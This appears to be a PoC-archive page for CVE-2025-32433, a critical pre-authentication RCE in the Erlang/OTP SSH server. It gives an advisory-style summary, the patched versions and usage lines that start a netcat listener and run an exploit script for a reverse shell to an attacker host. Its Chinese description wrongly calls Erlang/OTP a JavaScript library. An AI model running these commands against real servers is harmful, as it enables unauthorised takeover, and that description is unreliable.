POC详情: 424d1d9ed6c9ea118d5a28c368adbc8f70b85923

来源
关联漏洞
标题: Erlang/OTP 访问控制错误漏洞 (CVE-2025-32433)
描述:Erlang/OTP是Erlang/OTP开源的一个JavaScript编写的处理处理异常的库。该库可以捕捉node.js内置API引发的异常。 Erlang/OTP 27.3.3之前版本存在访问控制错误漏洞,该漏洞源于SSH协议消息处理缺陷,可能导致远程代码执行。
描述
CVE-2025-32433 Summary and Attack Overview
介绍
# CVE-2025-32433
CVE-2025-32433 Summary and Attack Overview

CVE-2025-32433 is a critical unauthenticated remote code execution (RCE) vulnerability in the Erlang/OTP SSH server, disclosed on April 16, 2025. Erlang/OTP SSH is a library used in various distributed and telecom applications. The flaw arises from improper handling of SSH protocol messages: the server fails to enforce the normal authentication sequence, allowing an attacker to send specially crafted SSH messages before authentication. By doing so, the attacker can inject and execute arbitrary Erlang code on the server​
nvd.nist.gov
​
offsec.com
. In practical terms, this means an attacker with network access to a vulnerable Erlang/OTP SSH server (often running as root) can trigger a reverse shell or execute commands without any credentials, leading to full system compromise​
nvd.nist.gov
​
offsec.com
. This vulnerability is assigned CVSS 10.0 (maximum severity)​
offsec.com
.

Affected versions are all Erlang/OTP releases below OTP-27.3.3, OTP-26.2.5.11, or OTP-25.3.2.20 (the patched versions)​
nvd.nist.gov
​
offsec.com
. Affected systems often include Linux servers or appliances running an Erlang-based SSH daemon (not to be confused with OpenSSH). Importantly, default OpenSSH servers on Linux/BSD are not vulnerable​
offsec.com
. Users should assume any exposed Erlang/OTP SSH server is affected, and apply the official patches or disable the SSH service immediately.

The attack works by initiating an SSH connection and then sending a sequence of SSH messages out of order. :

usage: 

sudo chmod +x exploit.py

nc -nvlp <lport>

python3 exploit.py -t <target-ip> -p 22 --lhost <attcker-ip> --lport <lisner-ip> 

ex: 

nc -nvlp 5555

python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555
文件快照

[4.0K] /data/pocs/424d1d9ed6c9ea118d5a28c368adbc8f70b85923 ├── [2.2K] concept for CVE-2025-32433 ├── [6.4K] exploit.py ├── [1.8K] README.md └── [ 224] usage 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。